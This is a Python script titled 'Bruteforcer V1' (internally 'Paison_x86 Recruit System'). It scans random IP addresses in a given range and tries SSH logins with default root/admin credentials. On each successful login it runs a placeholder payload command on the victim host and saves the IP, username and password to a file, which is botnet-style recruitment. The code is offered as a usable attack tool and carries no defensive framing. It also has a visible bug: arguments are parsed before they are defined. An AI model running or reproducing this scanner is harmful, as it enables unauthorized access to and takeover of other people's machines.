Bruteforcer V1

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3.  
4. import os
5. import sys
6. import time
7. import random
8. import argparse
9. import threading
10. import paramiko
11. from datetime import datetime
12.  
13. paramiko.util.log_to_file("/dev/null")
14.  
15. parser = argparse.ArgumentParser(description="Paison_x86 Recruit System.")
16. args = parser.parse_args()
17. parser.add_argument(
18.     '-m', action="store", dest="method",
19.     type=str, required=True, help="Select Method 'scan', 'load'."
20. )
21.  
22. parser.add_argument(
23.     '-u', action="store", dest="username",
24.     type=str, required=False, help="Set Username If None Set; Default (root)."
25. )
26.  
27. parser.add_argument(
28.     '-p', action="store", dest="password",
29.     type=str, required=False, help="Set Password If None Set; Default (admin)."
30. )
31.  
32. parser.add_argument(
33.     '-dp', action="store", dest="dest_port",
34.     type=int, required=False, help="Set SSH Port If None Set; Default (22)."
35. )
36.  
37. parser.add_argument(
38.     '-r', action="store", dest="range",
39.     type=str, required=True, help="Set IP Range; Example ('python rec_x86.py -m scan -u root -p admin -dp 22 -r 49.150')"
40. )
41.  
42. parser.add_argument(
43.     '-amt', action="store", dest="host_amt",
44.     type=int, required=False, help="Set Ips to generate for range If None Set; Default (1000)."
45. )
46.  
47. parser.add_argument(
48.     '-t', action="store", dest="timeout",
49.     type=int, required=True, help="Set Timeout"
50. )
51.  
52. parser.add_argument(
53.     '-o', action="store", dest="outfile",
54.     type=str, required=True, help="Set outfile"
55. )
56.  
57. PAYLOAD = "SET"
58.  
59. def puts(string):
60.     sys.stdout.write(string + "\n")
61.  
62. """
63.    Scanner
64. """
65. def run_worker(x):
66.     global PAYLOAD
67.  
68.     puts("[paison_rec] starting thread to scan host %s" % (x))
69.     ssh = paramiko.SSHClient()
70.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
71.  
72.     if (args.username):
73.         username = args.username
74.  
75.     elif (not args.username):
76.         username = "root"
77.  
78.     if (args.password):
79.         password = args.password
80.  
81.     elif (not args.password):
82.         password = "admin"
83.  
84.     if (args.dest_port):
85.         port = args.dest_port
86.  
87.     elif (not args.dest_port):
88.         port = 22
89.  
90.     try:
91.         ssh.connect(hostname=x, port=port, username=username, password=password, timeout=args.timeout)
92.    
93.         stdin, stdout, stderr = ssh.exec_command("echo 1")
94.         output = stdout.read()
95.         if ("1" in output):
96.             good = True
97.  
98.             if (good == True):
99.                 puts("[paison_rec] sent command %s" % (x))
100.                 ssh.exec_command(PAYLOAD)
101.                 ssh.close()
102.  
103.                 outf = open(args.outfile, "a").write("%s:%s:%s\n" % (x, username, password))
104.  
105.             if (good == False):
106.                 puts("[paison_rec] invalid credentials %s " % (x))
107.                 ssh.close()
108.  
109.     except Exception as e:
110.         puts("[paison_rec] %s [%s]" % (x, str(e)))
111.  
112.  
113. def start_worker():
114.     global hosts
115.  
116.     ip_rng = args.range
117.     if (args.host_amt):
118.         amt_total = args.host_amt
119.  
120.     if (not args.host_amt):
121.         amt_total = 1000
122.  
123.     amt_cnt = 0
124.  
125.     while True:
126.         final = ip_rng + '.' + str(random.randrange(0, 256)) + '.' + str(random.randrange(0 ,256))
127.  
128.         amt_cnt += 1
129.  
130.         run_worker(final)
131.  
132.         if (amt_cnt == amt_total):
133.             puts("[paison_rec] done scanning.")
134.             sys.exit()
135. """
136.    End Scanner
137. """